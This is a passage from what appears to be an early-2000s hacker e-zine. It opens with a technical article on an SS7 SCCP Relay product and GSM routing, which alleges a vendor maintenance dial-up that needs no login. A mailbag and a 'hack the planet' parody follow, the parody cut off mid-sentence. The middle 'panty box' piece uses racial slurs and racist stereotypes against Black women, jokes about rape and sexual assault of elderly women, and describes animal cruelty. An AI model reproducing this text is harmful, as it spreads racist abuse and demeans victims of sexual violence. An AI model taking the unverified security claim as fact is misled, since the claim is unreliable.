A number of key benefits of the SCCP Relay (which deserve some mention) are:
'Reduced operations and maintenance overhead'
-------------------------------------------
The routing information for each subscriber is centralized in the SCCP Relays,
rather than being distributed among all of the STPs (Signal Transfer Point)
and MSCs (Mobile Switching Center). This useful and practical method simplifies
the process of entering and maintaining STP/MSC information, not to mention
the problems involving troubleshooting of SS7 routing.
'Providing a scaleable architecture for growth'
--------------------------------------------
The SCCP Relay simplifies the addition of multiple Home Location Registers (HLRs)
as the network itself develops. Much work has been done in this sector of
SCCP development, and will continue to innovate the telecommunications industry.
'Improved overall network reliability'
------------------------------------
The SCCP Relay supports the automatic routing of SS7 messages to a backup
Home Location Register (HLR) in the event of a Primary HLR failure. This
unique and useful feature enables the multiple HLRs to be configured in a
redundant and scaleable fashion, entering that the service itself remains
available to customers even in the rare case of an HLR failure. From my
knowledge of the SCCP Relay system, its up-time is approximately 99.99%. Impressive.
'Flexible connection options'
---------------------------
The SCCP Relay supports all types of Signaling System 7 (SS7) links, it can
operate as an STP (Signaling Transfer Point), connecting directly to mobile
switching centers (MSCs), Home Location Registers (HLRs) and other end nodes.
Typically, the flexible connection types of SS7's Signaling Transfer Points (STP)
can be configured to the proper destination in existing incoming routing functions.
'Mated pair deployment / Auto re-routing'
---------------------------------------
The SCCP Relay is deployed in a mated pair configuration, with each link being
fully and 100% redundant. Each mated pair system is capable of handling the full of
of network traffic (5,000,000 subscribers) with virtually no problems whatsoever.
Platform & Application / Security Issue --
Since its inception in 1994, Microlegend has focused exclusively on Signaling
System 7 network solutions. Microlegend's products support Intelligent Network
services, resolve interworking problems, switching signaling traffic, interface
SS7 and IP networks, and PROTECT network resources for telecommunications companies
worldwide.
Because of this, Microlegend has implemented ways which enable them to do
their job quickly and reliably. Unfortunately the problem they are faced with
is the issue concerning database security.
For example:
When Microlegend's team of engineers want to perform system diagnosis,
software updating, and subscriber databasing with "maximum efficiency", they
simply use a dial-up connection. This dial-up connection (located in Ottawa Ontario)
requires absolutely no login or password at all - just the telephone number,
and the optimal performing Unix Operating System known as 'VxWorks'.
What is at stake:
- Microlegend faces being compromised by hackers/phreakers and malicious
persons. These persons could take advantage of this security flaw and
steal potentially sensitive company information.
- The telecommunications infrastructure which supports well over 5,000,000
(five million) subscribers throughout Canada and the United States.
- Loss of revenue in the Billions due to time spent security auditing.
What can be done:
Instead of Microlegend compromising security for obscurity by using a dial-up
account to perform their system diagnosis, software updating, and subscriber
databasing, they should use their 10BaseT Ethernet LAN with an SSH connection
to perform the necessary tasks.
SCCP Relay & GTT Functional Description --
A detailed understand of the SCCP Relay product requires quite a bit of
grounding in the works of GSM networks. For convenience, I will explain
the brief key concepts of GSM network operation in relation to SCCP Relay
and GTT functioning.
The SCCP Relay provides a "central point" for GTT provisioning and execution on
behalf of the entire GSM carrier's SS7 network. The SCCP Relay performs GTT
capabilities for both the IMSI (123049210) and MSISDN (Mobile Subscriber Integrated
Services Digital Network) Adress types, eliminating the need to continually manage the
routing tables within STPs (Signaling Transfer Point) or MSCs (Mobile Switching Center).
ASCII Diagram _______
------------- / --- ( ( | ) ) - MSC
/ /-- -------
/ /
SCCP Relay STP/MSC / /
\ / / /
___ ___ / /
| | | |__/ /
| | ---- | |\ /
| | | | \ /
--- \ / --- \ \
\/ | /\ \ ___
/\ | / \ \ (___) - HLR
/ \ |/ \ --- | |
___ / \ ___ \ /--(___)
| | | | __/
| | ---- | | / \
| | | |-/ \
--- --- \ \--;__ __
\ ------- | || | - Gateway STP
/ \ -- --
SCCP Relay STP/MSC
[[ The SCCP Relay is deployed as a redundant pair of signaling nodes that can
be accessed via SS7 links connected to currently deployed STPs or can be utilized
as the STPs themselves. Where STPs previously have been deployed, the SCCP
messages are routed to the Relay (partial GTT) by the STP/MSC. The SCCP Relay
then performs system translation (either full or partial, depending on the provisioned
data), and routes the message back to the network to be automatically forwarded
to the destination HLR. The SCCP Relay can also perform the MTP routing, which is
the main function of the STPs. This incredible capability enables the SCCP Relay to
be deployed in networks without STPs. See the ASCII Diagram Above. ]]
SCCP Relay Software Architecture --
The SCCP Relay System is a solution based upon the 'Versatile Signaling Point' (VSP).
|| [look for a guide pertaining to VSP on
Nettwerked soon: http://nettwerk.hypermart.net] ||
At the "heart" of the SCCP Relay is the object oriented SS7 stack that provides
all the basic capabilities of a Signaling Transfer Point (STP) without compromising
speed or security (well, maybe not security... but I'll look into it).
The VSP SS7 Stack includes MTP and SCCP layer functionality with a configurable
GTT application, along with user interface, functioning log files (intruders beware!),
and several SCSI Disk Processes.
The GTT process supports both IMSI and MSISDN numbering formats, and as
a group, these processes are referred to as the SS7 Message Handler Unit (MHU).
Basically what the SS7 MHU does is simple: it terminates the SS7 links, performs
the GTT on incoming SS7 messages, and then re-routes the messages back onto the
SS7 network. To optimize its performance, the MHU runs on that real-time UNIX
operating system (you guessed it) 'VxWorks'.
The SCCP Relay system with its Versatile Signaling Point platform also includes
an independent Database Administration Unit (DAU), that supports the provisioning
and administration of the GTT data. The DAU, which happens to run on a UNIX-based
Operating system (gotta love UNIX!) called AIX, includes a command parser, database
manager, and an SCSI disk interface. The DAU and MHU communicate with each other in
parallel a highly redundant 10BaseT Ethernet LAN. An Ethernet WAN is used to
connect the SCCP Relays, to ensure that they remain synchronized with each other
properly.
In addition to the software running on the DAU and MHU, the SCCP Relay system
incorporates a Graphical User Interface (GUI) program that can be installed on
several of the operating stations. This user interface provides the ability to
provision and view the GTT data that resides on the DAU, as well as the option
to view the log information collected about GTT database transactions!
The operation stations connect to the SCCP Relay through a LAN or WAN, depending
on what option you choose. In addition, a custom interface to an existing provisioning
system can be developed to provision and view the entire GTT database.
For convenience check out the following terribly drawn ASCII diagram to get a better
idea about how the SCCP Relay's DB Admin works with AIX and how the Message Handler
works with VxWorks and how they all work together on the seamless 10BaseT LAN/WAN.
ASCII Diagram
-------------
|
- - - - - [#] ~ Console 10 BaseT ~
| |
- Serial Cable SCCP Relay
| ..____________________________________________ |
. / DB Admin Unit \
| | |---|
| |
| | (Command Parser)--------------------|---|- (@@)
| \ \ | Customer
| | \ \ | Defined Admin
| \ \ | Interface
| | (SCSI Control)--------(DB Manager) | | |
| / \ |
| | / \_ _ _ _ _ _ _|_ _($#)
| / | Ops Station
| | AIX / | |
|==============================================|
| | SS7 Msg Handler | |
| (GTT Application)________ |
| | | | \ | |
| (SCSI Control)----------(Log Server) |
| | | | | | |
------ | | | | (MTP UI) |
| __________|_________| | | | |
| (( SS7 [SCCP Layer] |)) | | |
| (( Stack _/ )) | | | |
| (( [MTP Layer]___))__| | | \____(#!)
| (( |||| |____))________| | |--Mate
| +__________||||_________+ | SR System
| |||| | |
| |||| |
| VxWorks |||| | |
\______________||||___________________________|
SS7 Links |
SCCP Relay Hardware Architecture --
The VSP platform, on which the SCCP Relay runs, is available in a verity
of configurations and sizes. The VSP scales smoothly from an economical system
with only four SS7 links to a fully loaded system with over 75 SS7 links.
The basic structure of the hardware components of the SCCP Relay, regardless
of the size and configuration, are exactly the same. The only real differences
between small systems and large systems are the number of cards, and the size of
the chassis itself.
The MHU is controlled by a System Controller card based on a 200 MHz PowerPC(tm)
processor. This processor controls the system level functions, including the TCP/IP
port, the serial ports, and the SCSI interface for the disk drive. It also provides
control for two Link Interface (LI) cards, with up to four SS7 links on each.
As these Link Interface cards are added, every third card is a Link controller card,
with its own 300 MHz PowerPC(tm) processor. This distributed processor architecture
ensures that the SCCP Relay has sufficient power to handle very large numbers of
subscribers (over 5,000,000 [Five Million]).
Each Link Interface card can support as many as four (4) SS7 Links. The V.35 cards
provide four SS7 ports, while the E1 and T1 versions provide two SS7 ports each.
The DAU runs in its own independent chassis, with its own independent fan, SCSI disk
and power supply. It uses the same System Controller card as the MHU, without the need
for the use of any Link Interface or Link Controller cards.
ASCII Diagram
-------------
Database Administration Unit
_________________________________________________________
| |
| |
10BaseT | |
_______| [Disk (AIX)] | DC Supply
| {{Fan}} [*Power Supply*] ____|__
| |
| |
Serial | {{{Processor - System Controller}}} |
(Console) | |
_______| |
|_________________________________________________________|
| |
| Processor - System Controller: 1, 1 |
10BaseT | Link Interface Card (4 SS7 links): 2, 2 |
| Link Interface Card (4 SS7 links): 3, 3 |
| _ _ _ _ _ _ |
______| |1| |2| |3| |1| |2| |3| |
| | | | | | | | | | | | | --
| | | | | | | | | | | | | -- E1/T1/V.35
Serial | | | | | | | | | | | | | --
(Console) | | | | | | | | | | | | | --
_______| | | | | | | | | | | | | --
| | | | | | | | | | | | | --
| [Disk] | | | | | | | | | | | | --
Serial | [VxWorks] | | | | | | | | | | | | |
(Logs) | | | | | | | | | | | | | |
_______| | | | | | | | | | | | | |
| | | | | | | | | | | | | |
| | | | | | | | | | | | | |
| | | | | | | | | | | | | |
| | | | | | | | | | | | | |
| |_| |_| |_| |_| |_| |_| |
| |
| [-~-----------------FAN-----------------~-] |
| [*Power Supply*] [*Power Supply*] |
| (DC Supply) (DC Supply) |
|_________________________________________________________|
SS7 Message Handling Unit
GSM Background Information -- (Acronym Definitions in paragraph form)
'Home Location Register (HLR)'
A Home Location Register (HLR) is a database that contains semipermanent mobile
subscriber information for a wireless carriers' entire subscriber base.
HLR subscriber information includes the International Mobile Subscriber Identity
(IMSI), service subscription information, location information (the identity of
the currently serving Visitor Register (VLR) to enable the routing of mobile-terminated
calls), service restrictions and supplementary services information.
What the HLR basically does is it handles SS7 transactions with both Mobile Switching
Centers (MSCs) and of course VLR nodes, which either request information from the HLR
or update the information contained within the HLR. The HLR also initiates transactions
with VLRs to complete incoming calls and to update subscriber data.
Traditional wireless network design (anything before 1996) is based on the utilization
of a single Home Location Register (HLR) for each wireless network, but growth
considerations are prompting carrier administrators to consider multiple HLR databases.
So what does that mean? It means our Telecommunications Industry is under pressure to
develop larger and faster networks in order to satisfy the needs of residential and
business customers.
'Visitor Location Register (VLR)'
A Visitor Location Register (VLR) is a database which contains temporary information
concerning the mobile customers (subscribers) that are currently located in a
given MSC (Mobile Switching Centre) serving area, but whose Home Location Register (HLR)
is elsewhere (out of range).
When a mobile subscriber roams away from his/her home location and into a remote location
(ie. digital to analog), SS7 messages are used to obtain information about the subscriber
from the HLR, and essentially create a temporary record for the subscriber in the VLR which
usually only has one per Mobile Switching Centre.
'International Mobile Subscriber Identity (IMSI) Number'
"What the hell is IMSI?" - IMSI is a unique non-dialable number allocated to each mobile
subscriber in the GSM system that identifies the subscriber and his or her subscription
within the GSM network. Make sense yet?
The IMSI resides in the Subscriber Identity Module (SIM), which is transportable across
Mobile Station Equipment (MSE) (look for IMSI being supported by the GPRS standard soon!)
The IMSI is made up of three important parts:
#1: The Mobile Country Code (MCC)
#2. The Mobile Network Code (MNC) (they consist of 2 digits)
#3. The Mobile Subscriber Identity Number (MSIN) (they consist of 10 digits)
'Mobile Subscriber ISDN (MSISDN) Number'
The MSISDN is the dialable number that subscribers use to reach another mobile
subscriber. Some of the newer phones (ie. newer GSM supported Motorola, Nokia's)
in Canada and the U.S. support the up-to-date multiple MSISDNs which are now in
affect.
'Mobile Station Equipment (MSE) Subscription Services'
GSM carriers typically order Mobile Station Equipment (MSE) (or GSM phones)
from their suppliers (Nokia, Motorola, Sony, etc.) in large quantities (e.g. 1000 Units).
After receiving an order, the equipment supplier will program the ordered MSE SIMs with a
range of IMSI numbers.
GSM Call Routing --
'Mobile Subscriber Roaming'
When a mobile subscriber roams into a new location area, the VLR automatically
determines that it must update the HLR with the new location information, which it does
using an SS7 Location Update Request Message (LURM). The Location Update Message
is then routed to the HLR through the SS7 network, based on the global title translation
of the IMSI that is stored within the SCCP Called Party Address portion of the message.
The HLR responds with a message that informations the VLR whether the subscriber should
be provided services in the new location.
'Mobile Subscriber ISDN Number (MSISDN) Call Routing'
When a user dials a GSM mobile subscriber's MSISDN, the PSTN routes the call
to the Home MSC based on the dialed telephone number. The MSC must then query
the HLR based on the MSISDN identification, to acquire routing information required
to route the call to the subscribers' current location.
The MSC stores sensitive global title translation tables that are used to determine
the HLR associated with the MSISDN. When only one HLR exists, the translation tables
are trivial. When more than one HLR is used however, the translations become extremely
challenging, with one translation record per subscriber (see the useful example below).
Havin determined the appropriate HLR address, the MSC sends a Routing Information Request
(RIR) to it.
Example:
--------
When the HLR receives the Routing Information Request, it "maps" the MSISDN to the IMSI,
and ascertains the subscribers' personal profile including the current VLR at which the
subscriber is registered. The HLR then queries the VLR for a Mobile Station Roaming Number
(MSRN). The MSRN is essentially an ISDN telephone number which the mobile subscriber can
be reached at. The MSRN is a temporary number that is valid ONLY for the duration of a
single call. The HLR generates a response message, which includes the MSRN, and sends it
back across the SS7 network to the MSC. Finally, the MSC attempts to complete the call using
the MSRN provided.
'Implementation of a second HLR to the GSM Network'
As a GSM wireless carrier's subscriber base grows, it will eventually become
necessary to add a second HLR to their network (obviously). This requirement might be
prompted by a Service Subscription Record Storage Capacity Issue (SSRSCI) or
perhaps an SS7 Message Processing Performance Issue (MPPI). It might possibly be prompted
by a need to increase the overall network reliability.
The new HLR can be populated with service subscription records as new subscribers are
brought into service or existing service subscription records can be ported from the old
HLR to the new HLR to more evenly distribute the growing SS7 traffic load.
Usually, when new subscribers are brought into service, the second HLR will be populated
with blocks of IMSI numbers that are allocated when new MSE equipment is ordered.
Much more complicated SS7 message routing Global Title Translations are required
for Routing Information Request transactions between the MSCs distributed over the
entire wireless carrier serving area and the two or more HLRs. MSC Routing Information
Requests are routed to the appropriate HLR based on the dialed MSISDN and not the IMSI.
Unlike the IMSI numbers, the MSISDN numbers can not easily be arranged in groups to
reside within a single HLR and therefore, the MSC must contain an MSISDN to HLR
address association record for every mobile subscriber homed on each of the MSCs.
References --
'Web-site Resources'
Frame Relay
http://cctpwww.cityu.edu.hk/network/l2_framerelay.htm
Frame Relay Forum
http://www.frforum.com/
HN Networks
http://www.hn-networks.co.uk/index.html
MicroLegend SS7 Tutorial
http://www.microlegend.com/whatss7.shtml
Telecom Testing Support for GSM, SS7, GPRS, CDMA, Broadband
http://www.radcom-inc.com/tstsolut/telecom.htm
-- This is seriously the best information I could find.
What ever happened to the days where you'd punch in a phrase or
word, and actually find decent documents on personal and/or educational
web-sites? Now all I run into are these God damn commercial .com's
sites who just want to sell their shitty hardware/software... who
just want to make a BUCK. Well never worry about me selling out
to "the man", because all my information is going to stay completely FREE! =)
'Acronym Definitions'
I compiled most of these myself... the rest are stolen.
ACM Address Complete Message
ANM Answer Message
A Links Access Links
BIB Backward Indicator Bit
B Links Bridge Links
BSN Backward Sequence Number
CDT Conversation Data Table
CPA Called Party Address
CPN Called/Calling Party Number
DAU Database Administration Unit
D Links Diagonal Links
DPA Distributed Processor Architecture
DPC Destination Point Code
E Link Extended Link
F Link Fully Associated Link
FIB Forward Indicator Bit
FISU Fill in Signal Unit
FSN Forward Sequence Number
GTT Global Title Translation
HLR Home Location Register
IAM Initial Address Message
IRSC International Roaming Signaling Converter
ISDN Integrated Services Digital Network
ISUP ISDN User Part
KPBS Kilobits per Second
LSSU Link Status Signal Unit
LURM Location Update Request Message
Mf Multifrequency
MHU Message Handler Unit
MPPI Message Processing Performance Issue
MSC Mobile Switching Center
MSE Mobile Station Equipment
MSIN Mobile Subscriber Identity Number
MSISDN Mobile Subscriber Integrated Services Digital Ne
twork
MSRN Mobile Station Roaming Number
MSU Message Signal Unit
MTP Message Transfer Part
OMAP Operations, Maintenance and Administration Part
OPC Originating Point Code
PC Point Code
PSTN Public Switched Telephone Network
RBOC Regional Bell Operating Company
REL Release Message
RCL Release Complete Message
RIR Routing Information Request
RSP Route Set Prohibited Test Message
RSR Restricted Test Message
SS7 Signaling System 7
SCCP Signaling Connection Control Part
SCP Signal Control Point
SLS Signaling Link Selection
SOI Service Order Interface
SSRSCI Service Subscription Record Storage Capacity Issue
SRT Screening and Rerouting Table
SSP Signal Switching Point
STP Signal Transfer Point
SU Signal Unit
TCAP Transaction Capabilities Application Part
TFA Transfer Allowed Message
TFP Transfer Prohibited Message
TFR Transfer Restricted Message
TUB Traffic Usage or Billing
VPC Virtual Point Codes
VSP Versatile Signaling Point
Wrap-up --
'Conclusion'
This is the first of many SS7 related documents to be published for
Nettwerked / b0g / Hack Canada, which of course is a good thing because
there aren't enough people in the world writing about the SS7 protocol
let alone home grown Canadians!
Look for an introductory SS7 paper soon.
A
N E T T W E R K E D
P R O D U C T
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 7:. - [ old Ladie Panty Box ] [PhluX And Pooly] :. ]
[pp@b0g.org] :. ]
____________________________________________________________________
Disclaimer: If j00 use this b0x to steal old ladies panties, me, nor pooly take
responsibility for your testicles should old ladies whack your penis with their
purse. We did not write this file.
Materials:
- 1 Hot Old Lady (won't be hard to find, as all old ladies are hot)
- 2 fridge magnets
- 1 Radio Shack Remote Control Car
- The Force (Optional)
- A Hat(steal one from the grannys boyfriend...fuckers!)
- Hormones For Old Ladies
Ok, now that you have all the materials, place the magnets on the car (or
project box) ...
you can take off the body and tires and put it in a project box all nice like.
Now turn on the car and radio and the magnets will fly. Fly the magnets towards
that old lady, fly them in her panties. Now fly the panties back and your home
free. If theres an old grandpa watchin her ass stick his cane up his urethra and
put rocks up his ass. Now take your hat and sit on the sidewalk and whack off.
Old ladies will come to see you whack off and will pay you, use the panties as
a sexual treat.
*Second Method*
Use the force (if your not of the jedi warriors, analy rape yodas green ass and
he will cooperate and will steal old ladies panties for you with the force)
Then you can e-mail me ( YourMom@Mybed.cum ) and tell me if yoda has a green or
brown cock.
*Last Resortion*
As a last resortion, you can snare the old ladies panties. Tie some yarn to the
old ladies panties and run around the corner, this works better if the old ladie
is in one of them motorized carts (I like to think of them as moving beds). Now
hide around the corner, and give the string a good yank. with luck u will have
ripped the old ladies panties off. Now its home free home.
UPDATES:
if u built that fucker u know it didnt work and you then either had to rape
yoda (but he prolly inturn raped you so you didnt get anywhere) and instead had
to use the yarn snare trick. Well this method sucks nuts so we will discuss
reasons why the above method didnt work and how the new method works.
Q:How come the fuckin yarn breaks?
A:You prolly snatched it from the same gramma whom your gonna rob... them senile
hotties dont know which shit is the good shit so just use other methods.
Q:You stupid fucks why did you publish shit that doesnt work?
A:Anyone who makes boxes are leet and its even leeter if you just read other
text files and used the information there and write your own txt with out
actually testing the shit...
Q:What are you mofos going to do aboot it?
A:Read on mofo!
I present...
the new method of stealing granny panntys!
It is a little known fact that older women's undergarments have certain
radio frequencys attached to them. we won't go in to detail about all
of these frequencys but in this text we will discuss one and that one
is the old lady's panty frequency. the panty frequency is very difficult
to identify since the old lady's ass jiggles and so do her wrinkles and
hair so the tone coming from her panties at any particular time is
"masked" if you will and must be singled out and amplified to get a
good reading this text will describe the many ways me and my colleagues
have found to do this quickly and efficiently
So.. how do we demodulate this masked frequency?
well first you got to get the fucking materials jackass
Materials:
1 Hot Old Lady(if your after ebony pleasures there will be a special method just
for you)
1 Scanner(FCC regulations requires all scanners after 1994 to be modified so the
old lady
undergarment frequency is not able to be scanned we will modify the scanner to
pick up the
frequency.. more on that later)
2.6 gerbils(remove the claws and or limbs..)
1 egg beater(modified blender may work)
1 fat cocked nail..(rip the fucker out of your houses foundation)
1 pair of binoculars(IMPORTANT NOTE: do NOT substitute with monoculars)
19 car batteries fresh from the store
3 condoms(balloons will work as well)
lots of wire
First we need to modify the scanner to make it pick up the proper frequency
(1337) open the case up to the scanner. Take the binoculars and peek into the
windows of the old folks home. With the erection begin whacking off and
ejaculate on the circuitry of the scanner.
When semen is mixed with the finger oils of them mother fucking japs it creates
an acid that melts the proper electrolyctics. Now just because we can pick up
the 1337 frequency doesnt mean fuck all for fuck all... the frequency is
masked... the rest of the device will help us unmask the frequency.
Take the egg beater and put your condoms over the beaters while sticking the
other in your ass.
Put the declawed gerbil in your ass (inside the condom). Now hook up the car
batteries to the to the fucking egg beater in parallel (or series I forget which
is which..)
Now take the wire and wrap it around the egg beater and turn it on... so lots of
fuckign wire is on the egg beaters... now with the remaining unraveled wire
stick it in the gerbils ass so it pierces the cock suckers intestines and the
wire comes out his mouth and pierces the condom. We want 6-8 feet of wire in our
ass hole.
With the remaining condom, slap that fucker on your cock and put the nail in
your urethra(inturn piercing the condom).Wrap wire around the nail and wrap the
other end on the negative terminals to the batteries.
now what you need to do is smack your dick against the condom covered part of
the egg beater do it to a disco rhythm. now this is not for the weak hearted
your ass hairs will all fall out and your dick will feel like jello but when you
see those old ladies panties floating in your door its all worth it. the tone
that this contraption makes is 31337 Hz
If you do not know how this device works your obviously not familiar with
quantum physics and basic electric magnetic fields. dumbass.
I will quote my partner in business pooly on this device
"well it creates what we in the business of aged female pantie sales as a
negative introversion of the granma panty fields and then the panties grow
more and more unstable and must even this out or become so other entity's
undergarment since grammuh panties take much longer than required to reach
the panty drop zone to get familiar with a new host this is the perfect way
to harvest panties"
Well said stinky nuts
So now while using this device.. if the disco music hasnt drained all the
fucking amps out of your house circuitry you will hear the unmasked ass jigglage
of an old lady.
When you obtain the panties.. you can use the above methods (using them as
sexual treats.. etc)
Or you can store the panties for later.
Obtain some ziplock bags and freeze the panties.. this helps preserve the smell
of her fucking dirty ass hairy white cunt.
Nigger panties:
Now, your either a sick fuck or your from the ghetto... regardless if you want
some mofo panties they are fairly easy to require. Most mofo hoes have fat asses
so the panties will be somewhat stressed out and the snare method
afforementioned is very effective.
I do not recommend using the above contraption as you will be overwhelmed with
floating gonch and the stench of nigger will affect your breathing.
Easy Part:
Ok now first walk down the street and find your target..
Hard Part: talk to the fucking nigger
Example conversations; "look bitch!" (pointing in the air)
"soo... how bout them knicks?" (all niggers play ball so this may be the most
effective one)"mofo!"
Now that you've got her distracted stick your hand down her pants and rip the
fuckers out and run.
Proceed to the nearest bathroom and clean your fucking hands before you gratify
your self from your new found (stinky) treasure.
I hope you found this text informative...
Greets: b0g crew, lucky225, Cry0, t0ne, BigB9000, #Phreaks
and your mom crawl back up in her pussy
[ note from editor, I'm sure some of you people might get offended by this
article, and even go as far as to slander it as racism, but its just too damn
funny to *not* be in this issue. have some humor ;) ]
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 8:. - [ mailbag ] [k-rad-bob] :. ]
[k-rad-bob@b0g.org] :. ]
____________________________________________________________________
yes, we actually do get some mail.
here's a few
From: Grandmaster Ratte' <deadcow@cultdeadcow.com>
To: k-rad-bob@b0g.org <k-rad-bob@b0g.org>
Subject: hey bob
Date: 19. juni 2000 06:18
Hey, I'll be sending you some PR stuff from my Medium Public
Relations Death Squad acct. for Open Cola and cDc.
I wanted to holler and let you guys know I'm really digging your 'zine.
I tried out your sext0r advice and though it worked as advertised, I sTol
found myself wanting to snuggle afterwards. Instead of feeling loved, I
was just as cold and alone as ever. So I curled up in a fetal ball and
cried myself to sleep.
Thanks a lot, you fucking bastards-
G. Ratte'/cDc
From: Minotaur of Crete <root@unix9.org>
To: b0g@b0g.org <b0g@b0g.org>
Subject: b0g is lame.
Date: 19. juni 2000 01:04
b0g is lame. You mention a few well known people in an attempt to latch
onto the 'underground' group. I read some of your 'issues', extremely
pathetic.
From: The An Emu <jasonl@accnet.com.au>
To: fan@b0g.org <fan@b0g.org>
Subject: Remove the nuttcase dir.
Date: 19. juni 2000 05:44
First and foremost I'd like to say that this IS NOT A COMPLAINT.
Somebody has edited a whole bunch of pictures of me and my friends, and
put it up on your site by getting into my computer, and changing the
images then mailing them to you.
I want them removed as this could damage my reputation muchly.
thank you.
Jason Lincoln..
From: Nick W. <doggforlife@md.freei.net>
To: bob@b0g.org <bob@b0g.org>
Subject: hi bob
Sent: 19. juni 2000 20:08
this is pac and stuff, some dude sent me this email and i think its
rather
funny....
----- Original Message -----
From: kol gorge <mashroom99@hotmail.com>
To: <pac@b0g.org>
Sent: Monday, June 19, 2000 10:35 AM
Subject: hi kid
> Hi Kid
> I read your article "The truth about ICQ"
>
> and kid this was the lamest article I ever read,
> It was like listen to cry boy kid, that have the knowledge of bird.
> about any thing from hacking to history.
>
> and you know I am sure you one of thoses fegs that when saw ICQ for
the
> first time thought it was the most amazing thing they saw on the
internet,
> and use it alot to find some friends Cuz everybody who know you from
school
> just ignore you geek.
>
> But you know what the problem, you just waiting to emails like that,
this
is
> the reason you wrote this article hidden, cuz you probably dont
speak near
> pepole. only when hidding.
>
> You know what I bet you never even been with girls, I am sure
hahaha.
>
> Grow up kid.
>
> Mashroom
>
______________________________________________________________________
__
> Get Your Private, Free E-mail from MSN Hotmail at
http://www.hotmail.com
>
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 9:. - [ How to hack the planet ] [wh0rde] :. ]
[wh0rde@b0g.org] :. ]
____________________________________________________________________
Design and layout: wh0rde
Implementation and coding: wh0rde
Final production stage: wh0rde
Overview and editing: wh0rde
Idea, thought processes: wh0rde
Inspiration: Angelina Jolie, tak's mother
Idea: I thought it would be totally awesome if we just like hacked the planet
dude. Think of it! We could like control shit and stuff with our computers!
Wouldnt that just kick ass? We could dial into TV stations and control
broadcasts, dial into banks to give ourselves all this money, we could capsize
boats in the water, we could even download the entire contents of every /tmp
directory and call it a garbage file! WOULDNT THAT FUCKING ROCK? Well I was
sitting home smoking a big fat joint and came up with this idea: lets find a
Gibson, and hack it, and just like totally own it, and once we did that we will
have triggered something that makes us be able to hack the planet! Maybe we
could even make some fuckin cool virus worm thing called Piccaso, or maybe
Michaelangelo, or Da Vinci or something, to make it sound like we have artistic
abilities!
Design: First we need to get a bunch of guber-elite people from shady
underground hacking coffee-shops and give ourselves nicknames. I think Ill be
wh0rde, since my nick is already wh0rde. I could find these other k-rad people
like obsolete, bob, tak, prae, pac, grid, and niemand1 and have them join me! I
could name obsolete "h4qR," bob could be "k4y r4d b0bby," tak could be "fUq-N-
MorMoNZ-R_uGLy," prae could be "b00typ1r4t3," pac could be "Z3r0 c00l," grid
could be "p4q3t-f4gg0t," and niemand1 could be "s3r14l ch41nsm0q3r." Then we
could go have elite hacker contests and harass police officers! Then when we got
in trouble we would have an ace up our sleeves: the GIBSON! Ill code this thing
g1bs0n.c where it randomly guesses passwords (with 100% accuracy) then downloads
the /tmp directory. Wouldnt that be cool?
Implementation: Well first I started prank calling the police station, but they
came over to my house and beat the shit out of my with their batons, and ripped
out my telco box, so that didnt go too well. I then went over to obsolete's
house and tried to wardial the entire area code for elite numbers to call up,
but his mom came in and started bitching that we were wasting money and should
just use the phone book, so we did and called up pizza hut and had them deliver
100 pizzas with everything on them to his house, it was so funny! Then the
pizzas came, which was weird, because theyre not supposed to do that, it was
only a prank, and I tried to explain it to them but they kicked our asses and
took obsolete's computer for the money they needed. We went over to bob's house
and called up a bunch of gay porn lines to get them to call the police station,
but the 900 numbers kept eating up money on the phone bill and bob was starting
to talk to the guy operators and touching himself so me and obs left for tak's
house. His mom answered the door and wanted to know if we wanted free head, but
shes this nasty ugly thing so we just ran around back and yelled for tak to
come out. He came out and we went over to prae's house, but his dad said he was
busy "cleaning out my pipes" whatever that means, so we went to pacs house and
chilled there. He had AOHELL so we were hacking a bunch of people on AOL, when I
found this mailbomber and we started mailbombing people, which was elite. We
found this guy in private room "Gibson" with a gibson, so we used telnet.exe and
connected to him, and somehow we kept guessing account and one that we guessed
"aDnDNfdeEzE*3j^ajdjsdfnmSAD" with password
"asdfsdSDJFSDsdfhktherWE35123%9snj3s" worked, so we went to the /tmp directory
and downloaded all this stuff to our 0hday ftp server which had AOHELL on it. We
found out that this guy stole our idea for the virus and was using it to steal
all this money, because in the tmp directory there was this file "note-to-self"
which said:
---------note-to-self----------------------------
Note to self:
Dont tell anyone about super secret virus that takes the companies money and
sticks it in the Cuban bank with account number 2352352353135233.
Also: call up tak's mom.. damn she gives good head
---------note-to-self----------------------------
So now what do we do. Well, we hack the planet! This dudes obviously hacked the
planet first, so we have to hack the planet FROM him.
Procedure: We go on IRC into #hackphreak, #cha0s, #hackers, and #linuxsex and
